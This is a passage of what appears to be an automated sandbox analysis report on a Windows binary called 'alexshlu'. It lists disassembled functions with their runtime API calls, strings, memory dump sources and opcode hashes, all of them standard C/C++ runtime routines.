                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 002BC23B
                                                                                                                                                                                                                                          • Part of subcall function 002BA8D1: HeapAlloc.KERNEL32(00000000,002AA3DD,002A34FA,?,002AECE1,002A34FC,002A34FA,?,?,?,002AA03F,002AA3DD,002A34FE,002A34FA,002A34FA,002A34FA), ref: 002BA903
                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 002BC24E
                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 002BC25B
Memory Dump Source
• Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
Similarity
• API ID: __freea$__alloca_probe_16$AllocHeap
• String ID:
• API String ID: 1096550386-0
• Opcode ID: d13198c22729e3965de21feb7ad4eb86d48163b7fe9b136c180c22d0d1b964ed
• Instruction ID: 3249730c1d86981659a6255e2d89b97081cbacc89f9eb932551e39a92e815a88
• Opcode Fuzzy Hash: d13198c22729e3965de21feb7ad4eb86d48163b7fe9b136c180c22d0d1b964ed
• Instruction Fuzzy Hash: 2451A47262024AAFEF219FA4CC45DFB36A9EF85790F250529FD08D6141EB70DD309AA0
APIs
• __EH_prolog3.LIBCMT ref: 002A9ED5
• std::_Lockit::_Lockit.LIBCPMT ref: 002A9EE0
• std::_Lockit::~_Lockit.LIBCPMT ref: 002A9F4E
  • Part of subcall function 002A9DA2: std::locale::_Locimp::_Locimp.LIBCPMT ref: 002A9DBA
• std::locale::_Setgloballocale.LIBCPMT ref: 002A9EFB
• _Yarn.LIBCPMT ref: 002A9F11
Similarity
• API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
• String ID:
• API String ID: 1088826258-0
• Opcode ID: f875db1e11bf066e8a981772c1b221dd69a1731ce3e6a0633a42adbf7be1f91b
• Instruction ID: 6c163a30c74ce44341f8ed67f7dd1718c985ce2f566941e5e5fcc144238a4853
• Opcode Fuzzy Hash: f875db1e11bf066e8a981772c1b221dd69a1731ce3e6a0633a42adbf7be1f91b
• Instruction Fuzzy Hash: 2F01D471A251109FC705EF21E84963C7BA1FF86340B14404AE80297381CF389EA2DFD1
APIs
Strings
Similarity
• API ID: _strcspn
• String ID: .$invalid string position
• API String ID: 3709121408-2424062830
• Opcode ID: 0f6801b738f2e54d433e1ef105e5aedeedd2d1e95cd235afcb007515db076f81
• Instruction ID: 217bc1f832cddcf29f5ac8f0c681c2b5a7b07d483ff5286a142165f97d240e75
• Opcode Fuzzy Hash: 0f6801b738f2e54d433e1ef105e5aedeedd2d1e95cd235afcb007515db076f81
• Instruction Fuzzy Hash: BE02D2706283059FC714DF24C484A6AB7E5FF8A304F14896DF8958B362EB70ED65CB82
APIs
Strings
Similarity
• API ID: _strlen
• String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
• API String ID: 4218353326-1866435925
• Opcode ID: cb78b9407326338d9234a75ff79be164349bfb0acb1ca6233a60b7cd2e57f532
• Instruction ID: d960e23b26ad10f0d85c9e61692d51e2220c2dd6d9eb20652d863e90956f5eb6
• Opcode Fuzzy Hash: cb78b9407326338d9234a75ff79be164349bfb0acb1ca6233a60b7cd2e57f532
• Instruction Fuzzy Hash: EFC16A35624202CFC714CF28C490B6AB7E1FF8A714F55866CE9598B3A1DB35EC55CB81
APIs
Strings
Similarity
• API ID: _strlen
• String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
• API String ID: 4218353326-1866435925
• Opcode ID: 4e6018e3359f29574fa5844b9358a9930c58a898cabc7df249066f0d72b565ac
• Instruction ID: 0eceb4cc3ecada8fe636a6e50337c9207a65e9b67d9d53cc1b7245b31d9d2884
• Opcode Fuzzy Hash: 4e6018e3359f29574fa5844b9358a9930c58a898cabc7df249066f0d72b565ac
• Instruction Fuzzy Hash: B89191746142008FDB14CF29C494B25B7E6FF8A724F1886ACE9468F3A6DB35EC65CB41
APIs
  • Part of subcall function 002BAB23: GetLastError.KERNEL32(00000000,?,002BCF02), ref: 002BAB27
  • Part of subcall function 002BAB23: SetLastError.KERNEL32(00000000,?,?,00000028,002B6E76), ref: 002BABC9
• GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,002B46FA,?,?,?,00000055,?,-00000050,?,?,?), ref: 002BF395
• IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,002B46FA,?,?,?,00000055,?,-00000050,?,?), ref: 002BF3CC
Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast$CodePageValid
                                                                                                                                                                                                                                        • String ID: l#-$utf8
                                                                                                                                                                                                                                        • API String ID: 943130320-2281452077
                                                                                                                                                                                                                                        • Opcode ID: c7547229a6016b126de42eadfccd6f3eaa6aacb1373888d48b99f1ef3a53cf11
                                                                                                                                                                                                                                        • Instruction ID: 5b113448dbf579c083801ce3e1dfd1a7fb70362d3396743d8c25e54c40040045
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c7547229a6016b126de42eadfccd6f3eaa6aacb1373888d48b99f1ef3a53cf11
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4151E936620306AAD765AF70CE42FE773B8EF04780F14457AFA4997581E7B0E9608B61
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 002ACBF2
                                                                                                                                                                                                                                          • Part of subcall function 002ACC88: std::_Throw_Cpp_error.LIBCPMT ref: 002ACCA9
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Cpp_errorCurrentThreadThrow_std::_
                                                                                                                                                                                                                                        • String ID: @z-$Xi-$ios_base::badbit set
                                                                                                                                                                                                                                        • API String ID: 350343453-4006027970
                                                                                                                                                                                                                                        • Opcode ID: 0f5cbc6b480bfcc6ba855cac57b7872f3ba7bf73e43f3d087fe6f8566b68fd75
                                                                                                                                                                                                                                        • Instruction ID: 4bb301962f3c2eb26a1b2113a65076892fbe87dad67690876254715fe73a1b3b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0f5cbc6b480bfcc6ba855cac57b7872f3ba7bf73e43f3d087fe6f8566b68fd75
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 721193326606069FDB15DF54C851BAAB3A5FF46724F60052EE42A97680DF75AC20CB90
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,002C55BD,00000000,?,002D8370,?,?,?,002C54F4,00000004,InitializeCriticalSectionEx,002CE634,002CE63C), ref: 002C552E
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,002C55BD,00000000,?,002D8370,?,?,?,002C54F4,00000004,InitializeCriticalSectionEx,002CE634,002CE63C,00000000,?,002BA57C), ref: 002C5538
                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 002C5560
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                                                                                        • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                        • Opcode ID: ffb5eb81291a07864efca3d174bc6be5327112043334635c10e540b034e23414
                                                                                                                                                                                                                                        • Instruction ID: 225d2f722c3d3789714d0911abaccba1cb1393c4d7d209de28619e36cb24b7ea
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ffb5eb81291a07864efca3d174bc6be5327112043334635c10e540b034e23414
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4EE04870AD0309BBDF105F60FC0AF583BB59B10B91F640425F90CE45E0DB71EEA09645
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 002C292D
                                                                                                                                                                                                                                          • Part of subcall function 002BA9E1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,002BC231,?,00000000,-00000008), ref: 002BAA42
                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 002C2B7F
                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 002C2BC5
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 002C2C68
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2112829910-0
                                                                                                                                                                                                                                        • Opcode ID: 20186afd82c9583e4c6f8ee3c82fd519c1f1a6590c4622ca049aa5c9372b0449
                                                                                                                                                                                                                                        • Instruction ID: ba2a7e5ce04b3080fea6e5149e4bd66503874bdfcb513d47672b6a4231dc547c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 20186afd82c9583e4c6f8ee3c82fd519c1f1a6590c4622ca049aa5c9372b0449
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6DD18975D14248DFCB15CFA8D884AEDBBB4FF08314F28466EE416EB251EA30A955CF50
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AdjustPointer
• String ID:
• API String ID: 1740715915-0
• Opcode ID: d9e32a30dac21af1a1b35fcffe71af3f0043e21ad890425b23ab39e230b2f6a6
• Instruction ID: 68e4adbc4ec4a64e60bfecb79566390c0940057ce03b9be778ee4e6fd196a2f3
• Opcode Fuzzy Hash: d9e32a30dac21af1a1b35fcffe71af3f0043e21ad890425b23ab39e230b2f6a6
• Instruction Fuzzy Hash: B1510472A206079FDB25AF51D881BFAB7A4FF44780F14462EEA0647291D735ECE0CB90

APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 002A286C
• std::_Lockit::_Lockit.LIBCPMT ref: 002A288A
• std::_Lockit::~_Lockit.LIBCPMT ref: 002A28AC
• std::_Lockit::~_Lockit.LIBCPMT ref: 002A291A
Memory Dump Source
• Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_
• String ID:
• API String ID: 593203224-0
• Opcode ID: ec120066c5ef146ec729206fd042e016c0171bb6fbc23d8da51c4d1ac696295d
• Instruction ID: 1a64d3b20560e961ec3b3cdbcbf85a00a2e31763a2a67cbf7c40c96000970668
• Opcode Fuzzy Hash: ec120066c5ef146ec729206fd042e016c0171bb6fbc23d8da51c4d1ac696295d
• Instruction Fuzzy Hash: 0121B471D25211DFC710EF1AE849A2A73E0FB55724F05485EE5888B361EF34AD64CF92

APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 002A82AC
• std::_Lockit::_Lockit.LIBCPMT ref: 002A82CA
• std::_Lockit::~_Lockit.LIBCPMT ref: 002A82EC
• std::_Lockit::~_Lockit.LIBCPMT ref: 002A835A
Memory Dump Source
• Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_
• String ID:
• API String ID: 593203224-0
• Opcode ID: 66e70dd0f31da7afc919691a1886438cad2be585f993376a4a33d399806ae34a
• Instruction ID: 8ea3b6baf7aabab955b1ecf899d10bba734b4ab25c6ed90bbe3e0e8b5418cb74
• Opcode Fuzzy Hash: 66e70dd0f31da7afc919691a1886438cad2be585f993376a4a33d399806ae34a
• Instruction Fuzzy Hash: D921B471D192119FCB10EF19E849A2A77E0EF56724F45499EE4888B261EF34AC60CF92

APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 002A6B0C
• std::_Lockit::_Lockit.LIBCPMT ref: 002A6B2A
• std::_Lockit::~_Lockit.LIBCPMT ref: 002A6B4C
• std::_Lockit::~_Lockit.LIBCPMT ref: 002A6BBA
Memory Dump Source
• Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_
• String ID:
• API String ID: 593203224-0
• Opcode ID: 7478aa627f8bf452f255c072069bd01234b4a5e76fa70b058d20805963f4144c
• Instruction ID: 676c9eceb58dd4e90a35a9e2298833b8da58e22b9e3a86935870e2e6eb9b4b31
• Opcode Fuzzy Hash: 7478aa627f8bf452f255c072069bd01234b4a5e76fa70b058d20805963f4144c
• Instruction Fuzzy Hash: DB21A2719142159FC710EF15E849A5AB3E0EF55728F09485EE5849B391EF34AC60CFA2

APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 002A839C
• std::_Lockit::_Lockit.LIBCPMT ref: 002A83BA
• std::_Lockit::~_Lockit.LIBCPMT ref: 002A83DC
• std::_Lockit::~_Lockit.LIBCPMT ref: 002A844A
Memory Dump Source
• Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_
• String ID:
• API String ID: 593203224-0
• Opcode ID: 4cee47e67a4377ae37e75e14afa950f4f29608141df601583854b78eee7df0c0
• Instruction ID: 90fbd68a0b45baf38d414d9fdaba61fd8b2e8501e94a01986590161a7c5f54e5
• Opcode Fuzzy Hash: 4cee47e67a4377ae37e75e14afa950f4f29608141df601583854b78eee7df0c0
• Instruction Fuzzy Hash: 4821D671D143119FD710EF15E889A2AB3E0EF59724F01885EE4445B361EF34AC64CF92

APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 002A547C
• std::_Lockit::_Lockit.LIBCPMT ref: 002A549A
• std::_Lockit::~_Lockit.LIBCPMT ref: 002A54BC
• std::_Lockit::~_Lockit.LIBCPMT ref: 002A552A
Memory Dump Source
• Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_
• String ID:
• API String ID: 593203224-0
• Opcode ID: 06472d39429daff5e010443fc1f1cee7569db329303dc85e9988bc2387114a17
• Instruction ID: a26684f3c98710f8dd840d19b68bd90862d622042838949730fe49bdc543e937
• Opcode Fuzzy Hash: 06472d39429daff5e010443fc1f1cee7569db329303dc85e9988bc2387114a17
• Instruction Fuzzy Hash: E1219171D156209FC710EF19F949A1AB3A0EF5A724F05485EE4484B361EF34AD60CF92

APIs
  • Part of subcall function 002BA9E1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,002BC231,?,00000000,-00000008), ref: 002BAA42
• GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 002C075A
• __dosmaperr.LIBCMT ref: 002C0761
• GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 002C079B
• __dosmaperr.LIBCMT ref: 002C07A2
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1913693674-0
                                                                                                                                                                                                                                        • Opcode ID: da6f5ff6619ca3e0e2a667d7ce335eaef3b8311e417aa00a8dde3b444c208752
                                                                                                                                                                                                                                        • Instruction ID: 80cf232fc251e65f0eafb7a68601cebe25cc1f9c46a41a36dbfe597ab469b40e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: da6f5ff6619ca3e0e2a667d7ce335eaef3b8311e417aa00a8dde3b444c208752
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D521AF71A24206EF9B24AF61DCC4E6BB7A9AF103A4750861DF81997251E730FC648FA0
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 6654444c3d196b2a7c9086bf9362a523af7a77004acbe4ec7c5ba568447d00ec
                                                                                                                                                                                                                                        • Instruction ID: f7a4aebe6ff3a591192760adb73fb0ebead9aa91dd85f7452acaab698cb3973f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6654444c3d196b2a7c9086bf9362a523af7a77004acbe4ec7c5ba568447d00ec
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5221C37162420AAFDB12AFA5DCC59EB7BA8EF043E87104A15F915D7191EB70FC608B90
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 002C1AF4
                                                                                                                                                                                                                                          • Part of subcall function 002BA9E1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,002BC231,?,00000000,-00000008), ref: 002BAA42
                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002C1B2C
                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002C1B4C
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 158306478-0
                                                                                                                                                                                                                                        • Opcode ID: 182ce22d98763f00ef760e1e28f2c779672896dbb7f28693271f334ada663977
                                                                                                                                                                                                                                        • Instruction ID: c108eec3ed938d6cc8981e846a859a276a8ed5a6f7a3ce15a2e42e5da8f5e7d3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 182ce22d98763f00ef760e1e28f2c779672896dbb7f28693271f334ada663977
